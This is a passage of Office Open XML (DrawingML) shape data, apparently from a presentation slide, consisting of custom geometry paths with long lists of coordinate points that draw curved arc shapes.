                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="830898" y="738210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="866425" y="711759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="903896" y="687921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="943177" y="666829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="984136" y="648617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1026638" y="633417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1070551" y="621363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1115741" y="612588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1162075" y="607226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1209421" y="605409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1251527" y="606958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1293098" y="611425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1333597" y="618535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1372489" y="628015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1346684" y="584021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1322517" y="539168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1300027" y="493495"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1279251" y="447038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1260227" y="399837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1242993" y="351930"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1227586" y="303354"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1214044" y="254148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1202406" y="204350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1192708" y="153998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1184989" y="103130"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1179287" y="51784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1175639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886956" y="4672584"/>
              <a:ext cx="2421890" cy="2112645"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2421890" h="2112645">
                  <a:moveTo>
                    <a:pt x="2258369" y="605536"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1209421" y="605536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1256765" y="607371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1303097" y="612786"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1348283" y="621645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1392191" y="633810"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1434687" y="649143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1475638" y="667510"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1514912" y="688772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1552375" y="712793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1587893" y="739436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1621335" y="768565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1652567" y="800041"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1681456" y="833730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1707869" y="869493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1731673" y="907193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1752734" y="946695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1770921" y="987861"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1786099" y="1030555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1798135" y="1074639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1806898" y="1119976"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1812253" y="1166431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1814068" y="1213865"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1811704" y="1267749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1804736" y="1320381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1793348" y="1371552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1777723" y="1421056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1758046" y="1468683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1734500" y="1514225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1707269" y="1557476"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1676538" y="1598226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1642491" y="1636267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1627727" y="1651488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1598199" y="1683023"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1583436" y="1698243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2027936" y="2112264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2040530" y="2097980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2053161" y="2084482"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2065815" y="2071508"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2078482" y="2058796"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2078482" y="2055876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2111127" y="2020974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2142417" y="1984760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2172304" y="1947280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2200743" y="1908583"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2227685" y="1868713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2253086" y="1827720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2276897" y="1785649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2299071" y="1742547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2319655" y="1698243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2338326" y="1653441"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2355312" y="1607531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2370474" y="1560778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2383767" y="1513229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2395143" y="1464932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2404556" y="1415934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2411978" y="1366094"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2417309" y="1315934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2420545" y="1265200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2421636" y="1213865"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2420673" y="1165051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2417809" y="1116725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2413080" y="1068924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2406523" y="1021685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2398173" y="975042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2388066" y="929034"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2376240" y="883696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2362730" y="839064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2347572" y="795175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2330803" y="752065"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2312459" y="709770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2292576" y="668327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2271191" y="627772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2258369" y="605536"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2421890" h="2112645">
                  <a:moveTo>
                    <a:pt x="1209421" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1160676" y="964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1112429" y="3831"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1064715" y="8567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1017570" y="15133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="971030" y="23495"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="925131" y="33616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="879909" y="45458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="835398" y="58987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="791635" y="74166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="748656" y="90958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="706497" y="109328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665192" y="129238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="624778" y="150654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="585291" y="173537"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546766" y="197853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="509239" y="223565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="472746" y="250636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437323" y="279030"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="403005" y="308712"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369828" y="339644"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337828" y="371791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="307040" y="405115"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277501" y="439582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249246" y="475154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222310" y="511795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196730" y="549469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172541" y="588140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="149780" y="627772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128481" y="668327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108680" y="709770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90414" y="752065"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73718" y="795175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58627" y="839064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45178" y="883696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33407" y="929034"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23348" y="975042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15038" y="1021685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8512" y="1068924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3807" y="1116725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="957" y="1165051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1213865"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1047" y="1265200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4168" y="1316021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9330" y="1366281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16441" y="1415614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25535" y="1464454"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36548" y="1512569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49444" y="1559919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64186" y="1606462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80736" y="1652155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99057" y="1696955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119113" y="1740822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140867" y="1783713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164281" y="1825586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189319" y="1866398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215943" y="1906108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244117" y="1944673"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="273803" y="1982052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304965" y="2018202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337566" y="2053082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337566" y="2055876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="371221" y="2089784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="798829" y="1658873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="781939" y="1641983"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="779145" y="1639061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="748274" y="1604977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="719934" y="1568653"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694295" y="1530225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="671526" y="1489831"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="651795" y="1447609"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="635273" y="1403695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="622128" y="1358226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="612529" y="1311341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="606645" y="1263175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="604647" y="1213865"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="606462" y="1166431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="611819" y="1119976"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620586" y="1074639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="632627" y="1030555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="647812" y="987861"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="666005" y="946695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="687074" y="907193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="710886" y="869493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="737308" y="833730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="766206" y="800041"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="797447" y="768565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="830898" y="739436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="866425" y="712793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="903896" y="688772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="943177" y="667510"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="984136" y="649143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1026638" y="633810"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1070551" y="621645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1115741" y="612786"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1162075" y="607371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1209421" y="605536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2258369" y="605536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2248339" y="588140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2224057" y="549469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2198381" y="511795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2171347" y="475154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2142991" y="439582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2113351" y="405115"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2082461" y="371791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2050359" y="339644"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2017080" y="308712"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1982661" y="279030"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1947137" y="250636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1910546" y="223565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1872923" y="197853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1834305" y="173537"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1794727" y="150654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1754227" y="129238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1712840" y="109328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1670602" y="90958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1627550" y="74166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1583721" y="58987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1539149" y="45458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1493872" y="33616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1447925" y="23495"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1401345" y="15133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1354169" y="8567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1306432" y="3831"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1258170" y="964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1209421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171688" y="5958840"/>
              <a:ext cx="2426335" cy="2425065"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2426334" h="2425065">
                  <a:moveTo>
                    <a:pt x="1246885" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1243281" y="51784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1237695" y="103130"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1230142" y="153998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1220639" y="204350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1209201" y="254148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1195843" y="303354"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1180582" y="351930"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1163432" y="399837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1144410" y="447038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1123531" y="493495"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1100811" y="539168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1076265" y="584021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1049908" y="628015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1088820" y="618535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1129363" y="611425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1170977" y="606958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1213103" y="605409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1260484" y="607226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1306852" y="612588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1352074" y="621363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1396017" y="633417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1438548" y="648617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1479533" y="666829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1518840" y="687921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1556334" y="711759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1591883" y="738210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1625354" y="767140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1656613" y="798418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1685527" y="831908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1711963" y="867479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1735788" y="904997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1756869" y="944328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1775072" y="985340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1790264" y="1027899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1802312" y="1071872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1811082" y="1117127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1816442" y="1163528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1818258" y="1210945"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1816442" y="1258360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1811082" y="1304759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1802312" y="1350010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1790264" y="1393978"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1775072" y="1436531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1756869" y="1477536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1735788" y="1516859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1711963" y="1554369"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1685527" y="1589931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1656613" y="1623412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1625354" y="1654680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1591883" y="1683602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1556334" y="1710044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1518840" y="1733874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1479533" y="1754958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1438548" y="1773163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1396017" y="1788357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1352074" y="1800406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1306852" y="1809177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1260484" y="1814537"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1213103" y="1816354"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1165723" y="1814537"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1119355" y="1809177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1074133" y="1800406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1030190" y="1788357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="987659" y="1773163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="946674" y="1754958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="907367" y="1733874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="869873" y="1710044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="834324" y="1683602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="800853" y="1654680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="769594" y="1623412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="740680" y="1589931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="714244" y="1554369"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="690419" y="1516859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="669338" y="1477536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="651135" y="1436531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="635943" y="1393978"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="623895" y="1350009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="615125" y="1304759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="609765" y="1258360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="607948" y="1210945"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="610291" y="1156721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="617186" y="1103983"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="628435" y="1052893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="643842" y="1003617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="663207" y="956317"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="686333" y="911157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="713022" y="868301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="743076" y="827913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="298322" y="414020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="266303" y="452448"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="235852" y="492172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207019" y="533146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="179851" y="575320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154396" y="618646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130702" y="663076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108817" y="708563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88788" y="755058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70665" y="802513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54494" y="850880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40324" y="900110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28202" y="950157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18177" y="1000971"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10296" y="1052505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4608" y="1104711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1160" y="1157540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1210945"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="918" y="1258593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3650" y="1305778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8162" y="1352464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14420" y="1398619"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22391" y="1444207"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32041" y="1489196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43336" y="1533552"/>
                  </a:lnTo>
                  <a:lnTo>
